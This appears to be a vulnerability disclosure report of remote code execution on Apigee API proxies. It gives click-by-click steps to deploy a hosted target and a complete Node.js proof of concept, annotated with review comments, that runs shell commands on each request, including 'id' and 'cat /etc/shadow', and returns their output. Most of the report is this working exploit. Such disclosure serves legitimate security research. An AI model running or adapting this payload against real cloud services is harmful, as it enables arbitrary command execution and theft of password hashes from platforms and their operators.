Summary: RCE on Apigee API proxies
Steps to reproduce:
1.- Open apigee.com and log in with your account
2.- navigate to Develop > API proxies and click “+Proxy” button
3.- Select hosted target: – put any name (in this case “rce”) – select the “Quick start” radio button and click the “Next” button – then “Next” again, and “Next” one more time – check the “prod” checkbox and click the “Create and Deploy” button – after the deploy, copy the URL and click “Edit proxy”
4.- Select the “Develop” tab, then click the “index.js” file in the “Resources > hosted” section, replace the content of that file with the code below, and click “Save” and then “Save” one more time:
var http = require('http');
const { exec } = require('child_process');
// Proof-of-concept body for the hosted target's index.js, as submitted in the
// report: each HTTP request makes the Node.js process run one fixed shell
// command line and send that command's standard output back to the caller.
// NOTE(review): a hosted target runs customer-supplied Node.js, so the thing to
// confirm on the platform side is which identity and filesystem this process
// is given. /etc/shadow is normally readable only by root, so its contents in
// the response would suggest the runtime is not an unprivileged, isolated
// user. The page shows no output, so verify before relying on that.
const POC_COMMAND =
  'echo "- - - - id - - - -";id; echo ;echo "- cat /etc/shadow - ";cat /etc/shadow';
const POC_TAG = '\npoc by @omespino';

function handleRequest(req, resp) {
  // Declared as JSON, although the body written below is plain command output.
  resp.setHeader('Content-Type', 'application/json');

  // Per the report, the command string is arbitrary: whatever is placed here
  // runs with the privileges of the hosted-target process.
  exec(POC_COMMAND, (error, stdout, stderr) => {
    // Only stdout is returned; error and stderr are not inspected, so a failed
    // command yields whatever stdout was captured followed by the author tag.
    resp.end(stdout + POC_TAG);
  });
}

const svr = http.createServer(handleRequest);

// Listen on PORT from the environment, falling back to 3000 when it is unset
// or empty. The listen callback is intentionally a no-op.
svr.listen(process.env.PORT || 3000, function () {});